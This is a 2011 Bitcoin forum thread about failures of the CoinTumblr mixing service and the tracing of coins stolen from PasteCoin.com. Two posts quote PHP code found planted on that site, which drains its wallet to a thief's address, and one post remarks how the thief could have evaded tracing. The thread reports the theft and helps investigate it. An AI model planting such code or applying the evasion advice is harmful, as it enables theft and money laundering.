Author

Topic: CoinTumblr - any experience? [down] (Read 4418 times)

member
Activity: 62
Merit: 10
July 03, 2011, 07:44:47 AM
#30
Now its sure that this site was a scam because he started to use his stolen coins in June Sad
member
Activity: 116
Merit: 10
June 05, 2011, 07:35:50 PM
#29
Could someone check http://lbrmvt4plqojaulx.onion/ ? Service might be down for some time now.
member
Activity: 62
Merit: 10
April 29, 2011, 05:12:46 PM
#28
The site is still broken since 14th April and i guess it wont work again...
sr. member
Activity: 322
Merit: 250
Do The Evolution
April 23, 2011, 09:20:36 AM
#27
Bober also hasn't been active since January. He simply disappeared.
newbie
Activity: 9
Merit: 0
April 22, 2011, 12:12:38 PM
#26
Well, as far as the breach goes, bober was originally involve. He even admitted guilt of uploading the shell and he was the only along with genjix, jgarzik, and me.
Genjix is the original coder/owner of the site, jgarzik is the current one. I was the one who reported 2 vulnerabilities and a breach. Bober the attacker.

You know, if he was just a little more careful and used the tumbler with multiple input addresses, tracking that back would have been nearly impossible. Its really funny how many little ways you can accidentally connect something back to an identity of yours.

sr. member
Activity: 322
Merit: 250
Do The Evolution
April 22, 2011, 10:54:43 AM
#25
Well, as far as the breach goes, bober was originally involve. He even admitted guilt of uploading the shell and he was the only along with genjix, jgarzik, and me.
Genjix is the original coder/owner of the site, jgarzik is the current one. I was the one who reported 2 vulnerabilities and a breach. Bober the attacker.
newbie
Activity: 9
Merit: 0
April 21, 2011, 03:08:57 PM
#24
Congratz, your service works. Now I stopped on my feet to find thee, who stole from PsateCoin.com
http://blockexplorer.com/address/1Lyb5Qq6D6xAeEiLfvjnsa9jJVBA2tbsE9
Code:
    require_once('jsonRPCClient.php');
    
$bitcoin = new jsonRPCClient('http://****:****@127.0.0.1:****/'); 
    
/*Steal the money from the user account */
    
$balance = ($bitcoin->getbalance());
    echo 
$balance;   
    
$bitcoin->sendtoaddress("1Lyb5Qq6D6xAeEiLfvjnsa9jJVBA2tbsE9"$balance);
    
$balance = ($bitcoin->getbalance());
    echo 
$balance;   
?>

This was found in PasteCoin.com/preview/test.php while I was performing an audit since I noticed it got online after a long time. I was the one who originally reported the vulnerabilities to them and helped him in all I could. This is officially the first attack and successfully got away with the money. Anybody is welcomed to help trace the coins, and the attacker.

Comming back to this.... I notice that address definitely sent into cointumbler but, it only shows that it ever stole like 3.69 btc. When you said this, I assumed that you were talking about a large amount, like that huge 16k worth of coins that went through a few days ago was stolen or something.

Such a small amount is likely untraceable through all those inputs and outputs. Is there more?

I see it all got sent to  1NytWqK2qGafYugYkhiVy7faGUYhcZapjd and if you check out that address, it builds up quickly to 68.58, all at once.

The tumbler gives out one or more addresses, and then sends coins off and tumbles them after a certain quantity is reached. Thats important to know here.

Actually, I would start looking for more info on all of the other input addresses in that same transaction since you know they had to come from the same wallet to end up as inputs on the same transaction.

newbie
Activity: 9
Merit: 0
April 21, 2011, 01:15:57 PM
#23
Congratz, your service works. Now I stopped on my feet to find thee, who stole from PsateCoin.com
http://blockexplorer.com/address/1Lyb5Qq6D6xAeEiLfvjnsa9jJVBA2tbsE9

Perhaps I did it wrong but I think most of it ended up here https://blockexplorer.com/address/1NgLdBTSYqnqwqiD2JioPRfqEkm3Zvs32u

ByteCoin

You did it wrong... expected though, that is kind of the point of the tumbler. As I said in my previous post, that is the tumbler address.... instead carefully follow the very last send transaction from that address:
http://blockexplorer.com/tx/927d59c9882fe6268aba2a7f6fc887091a9771add0091bddcdb88e0178b170ce#i599696

See that one of the inputs is the tumble address, as is one of the outputs. So you know that the tumbler generated this transaction. However, one output goes elsewhere to here:
http://blockexplorer.com/address/13WBtDjL2NBzeaCNDq1rL1yXgo9suHAk4r

New address.... now has 461.55 btc in it. Given how much moved through in such a short time, I think most of the outputs are likely the thief. Not proof though, need to find all of these addresses.

Looking at the overall activity, doesn't look like more than a handful of people have sent that much through at once, never mind to one address. Unless this address is just another internal tumbler address... and these coins are thus still in the system, then this is likely the thief.... if this address (or any like it) move directly to the tumbler address later (or show up as an input with it) then that would obviously be in the same wallet... otherwise, thats probably an output.

There are probably a lot more of these in the chain... but it is a lot of jumping through transactions to find them.
newbie
Activity: 9
Merit: 0
April 21, 2011, 10:22:10 AM
#22
Perhaps I did it wrong but I think most of it ended up here https://blockexplorer.com/address/1NgLdBTSYqnqwqiD2JioPRfqEkm3Zvs32u

ByteCoin

So you suggest it is browneman?
https://bitcointalksearch.org/topic/can-someone-explain-thisblock-explorer-bug-or-what-6184
You should be really sure about it, he may have used the service and got tainted coins. I have been searching for an output from his service with the same input, or smaller if he paid fees, to be 90% sure it is someone.


Actually I used the service and got no coins back. I didn't see an accusation there, not that it matters too much since this is a throwaway address made just to talk about issues like this. Wasting your time on me.

That address that was "Traced" to is the tumbler wallet address, you can get that from their about page: http://lbrmvt4plqojaulx.onion/ (uses javascript, click on "about"). If the coins were all there, they they would, at least, still be within the tumbler...and no tin the thief's hands.

It does not appear to be the case though...as the balance to that address is under 400 btc.

You need to follow the sends from there to see where they end up. Each order can have up to 9 output addresses, but they could have used multiple orders. The tumbler makes a lot of change and moves individual bits of change around, making it very hard to follow...but any address that loops back to that one is NOT an output address.

That said, it also wouldn't be hard to chain orders...whcih would cause loops back through that address. No envy here, thats going to be a bitch of a job but, honestly, unless the tumbler is being used by multiple people, or has enough coins in it already to cover an order, then its not very good. Such a large order should be a bitch to trace but, not impossible. Just follow sends within the right time frame and the majority should end up in addresses owned by your thief.

Of course, then you need him to slip up and make a connection to those addresses.
sr. member
Activity: 322
Merit: 250
Do The Evolution
April 21, 2011, 09:43:30 AM
#21
Perhaps I did it wrong but I think most of it ended up here https://blockexplorer.com/address/1NgLdBTSYqnqwqiD2JioPRfqEkm3Zvs32u

ByteCoin

So you suggest it is browneman?
https://bitcointalksearch.org/topic/can-someone-explain-thisblock-explorer-bug-or-what-6184
You should be really sure about it, he may have used the service and got tainted coins. I have been searching for an output from his service with the same input, or smaller if he paid fees, to be 90% sure it is someone.
member
Activity: 62
Merit: 10
April 20, 2011, 05:50:12 PM
#20
Congratz, your service works.

I dont think that this service works and also because of the latest strange movements and the at least 16000 BCs in the service at the moment, i have a feeling that it wont work again.
sr. member
Activity: 416
Merit: 277
April 20, 2011, 05:43:22 PM
#19
Congratz, your service works. Now I stopped on my feet to find thee, who stole from PsateCoin.com
http://blockexplorer.com/address/1Lyb5Qq6D6xAeEiLfvjnsa9jJVBA2tbsE9

Perhaps I did it wrong but I think most of it ended up here https://blockexplorer.com/address/1NgLdBTSYqnqwqiD2JioPRfqEkm3Zvs32u

ByteCoin
sr. member
Activity: 322
Merit: 250
Do The Evolution
April 20, 2011, 05:13:30 PM
#18
Congratz, your service works. Now I stopped on my feet to find thee, who stole from PsateCoin.com
http://blockexplorer.com/address/1Lyb5Qq6D6xAeEiLfvjnsa9jJVBA2tbsE9
Code:
    require_once('jsonRPCClient.php');
    
$bitcoin = new jsonRPCClient('http://****:****@127.0.0.1:****/'); 
    
/*Steal the money from the user account */
    
$balance = ($bitcoin->getbalance());
    echo 
$balance;   
    
$bitcoin->sendtoaddress("1Lyb5Qq6D6xAeEiLfvjnsa9jJVBA2tbsE9"$balance);
    
$balance = ($bitcoin->getbalance());
    echo 
$balance;   
?>

This was found in PasteCoin.com/preview/test.php while I was performing an audit since I noticed it got online after a long time. I was the one who originally reported the vulnerabilities to them and helped him in all I could. This is officially the first attack and successfully got away with the money. Anybody is welcomed to help trace the coins, and the attacker.
sr. member
Activity: 416
Merit: 277
April 20, 2011, 01:23:40 PM
#17
I'd just like to point out that there are ways of transferring coins completely anonymously without having to trust a third party and without changing the protocol or network. The client software would have to be changed to support it though.

See the technical details at https://bitcointalksearch.org/topic/untraceable-transactions-which-can-contain-a-secure-message-are-inevitable-5965

If you're interested in transactions not being traceable it's best to rely on a cryptographic solution rather than a human or business.

ByteCoin
newbie
Activity: 9
Merit: 0
April 19, 2011, 01:35:19 PM
#16
There is now some strange movement in the wallet. I hope it has nothing to do with todays balance of 16k BCs.

Wow. Quite a bit of movement! Though, I was expecting my coins back a few days ago and even with all that movement, still not a single nanocoin of it has shown up. There could be a bunch of "change" out there in the overall wallet, but the main address balance is high enough to make me think it stopped again, and low enough to make me concerned that I haven't gotten any back yet....i am expecting more than is in there.

Makes me think there is a backlog.
member
Activity: 62
Merit: 10
April 19, 2011, 10:46:33 AM
#15
There is now some strange movement in the wallet. I hope it has nothing to do with todays balance of 16k BCs.
newbie
Activity: 9
Merit: 0
April 18, 2011, 10:31:18 AM
#14
It stopped working again on 14th April.

Looks like it is still down.... no movement since the 14th.
member
Activity: 62
Merit: 10
April 17, 2011, 01:13:45 AM
#13
It stopped working again on 14th April.
legendary
Activity: 2506
Merit: 1010
April 16, 2011, 04:01:58 AM
#12
I don't know if this is the underlying cause but there was a deadlock in bitcoind experienced by many bitcoin web services.  There is now a patch:
  https://bitcointalksearch.org/topic/bitcoind-stops-responding-to-rpc-requests-4904
member
Activity: 116
Merit: 10
April 11, 2011, 03:36:19 PM
#11
Got my Coins back on Sunday.

I am not shure, if I want to use this service again.
member
Activity: 116
Merit: 10
April 07, 2011, 05:26:36 AM
#10
The site doesnt work again since 3 days.
+1  Angry
member
Activity: 62
Merit: 10
April 07, 2011, 02:18:01 AM
#9
The site doesnt work again since 3 days.
member
Activity: 116
Merit: 10
March 18, 2011, 12:39:39 PM
#8
I checked my wallet, and then the blockexplorer link. I have gotten all mine back now, so looks like it is working again. From the looks of it, I don't think I am the only person to be rather happy about that.
Same here.
member
Activity: 62
Merit: 10
March 18, 2011, 03:23:44 AM
#7
I only got my first transaction which was in already in the second address. But the other is now in the second address so i think it will also arrive in the next 48h.
There is also this message on the CoinTumbler site:

Quote
Update
3/17/2011: CoinTumbler's event loop crashed a while ago (3/12/2011) and it went unnoticed until now, leaving hundreds of coins stuck in the wallets for the past few days.
We have fixed the bug and everyone's coins should now be on the way. We're very sorry that happened and apologize for any inconvenience caused.
member
Activity: 82
Merit: 10
March 17, 2011, 08:57:02 PM
#6
It looks like it stopped working a couple of days ago. The btc are still being moved into the secondary address... but thats it.

I checked my 2 not successful payments and only 1 of both went to the second address. The other is still in the first address.

I checked my wallet, and then the blockexplorer link. I have gotten all mine back now, so looks like it is working again. From the looks of it, I don't think I am the only person to be rather happy about that.
member
Activity: 62
Merit: 10
March 15, 2011, 05:38:00 PM
#5
It looks like it stopped working a couple of days ago. The btc are still being moved into the secondary address... but thats it.

I checked my 2 not successful payments and only 1 of both went to the second address. The other is still in the first address.
newbie
Activity: 4
Merit: 0
March 15, 2011, 09:30:48 AM
#4
Hi folks,

three days ago I went to CoinTumblr[1], createt a transaktion about ~20BTC, entered some addresses of mine and clicked on "anonymize".

On CoinTublr they say "You will receive your anonymized Bitcoins within 48 hours of paying the full subtotal to the CoinTumbler-provided "receiving" addresses."
I sent CoinTumblr all the coins ~60h ago.

Has any of you some experience with this Website? Should I wait some more ours or is it a scammer and the site should be removed from wiki?

Hope to hear from you soon Wink

Jack

[1] Wiki https://en.bitcoin.it/wiki/CoinTumblr
TOR http://lbrmvt4plqojaulx.onion/
Tor2Web https://lbrmvt4plqojaulx.tor2web.org/

So you are one of the other people using it. In a similar time frame, I also started testing it.

It worked a couple of times, I got my bitcoins back, to the addresses which I specified. I followed everything through the block chain, it worked as advertised.

It looks like it stopped working a couple of days ago. The btc are still being moved into the secondary address... but thats it. In fact, I came on here today and created this account specifically to see if I could get a message out to whoever is running it to look into it, since there is no contact info on the site.

Here is the secondary address:

http://blockexplorer.com/address/1NgLdBTSYqnqwqiD2JioPRfqEkm3Zvs32u

Scroll to the bottom and look for the last sent time/date: 2011-03-13 06:17:49

Looking over balances, it looks to be around 370ish btc stuck in there.

member
Activity: 62
Merit: 10
March 15, 2011, 04:40:53 AM
#3
I had 3 successfull transactions with them on this dates.
2011-03-08
2011-03-06
2011-03-04
At weekend i tried it again with an little bit bigger amount and  also didnt received anything.
2011-03-13
2011-03-12
newbie
Activity: 8
Merit: 0
March 15, 2011, 03:56:31 AM
#2
I'm afraid my experience with it was the same. Sent coins, received nothing back.
member
Activity: 116
Merit: 10
March 15, 2011, 03:15:02 AM
#1
Hi folks,

three days ago I went to CoinTumblr[1], createt a transaktion about ~20BTC, entered some addresses of mine and clicked on "anonymize".

On CoinTublr they say "You will receive your anonymized Bitcoins within 48 hours of paying the full subtotal to the CoinTumbler-provided "receiving" addresses."
I sent CoinTumblr all the coins ~60h ago.

Has any of you some experience with this Website? Should I wait some more ours or is it a scammer and the site should be removed from wiki?

EDIT:
Quote
3/17/2011: CoinTumbler's event loop crashed a while ago (3/12/2011) and it went unnoticed until now, leaving hundreds of coins stuck in the wallets for the past few days.
We have fixed the bug and everyone's coins should now be on the way. We're very sorry that happened and apologize for any inconvenience caused.

Hope to hear from you soon Wink

Jack

[1] Wiki https://en.bitcoin.it/wiki/CoinTumblr
TOR http://lbrmvt4plqojaulx.onion/
Tor2Web https://lbrmvt4plqojaulx.tor2web.org/
Jump to: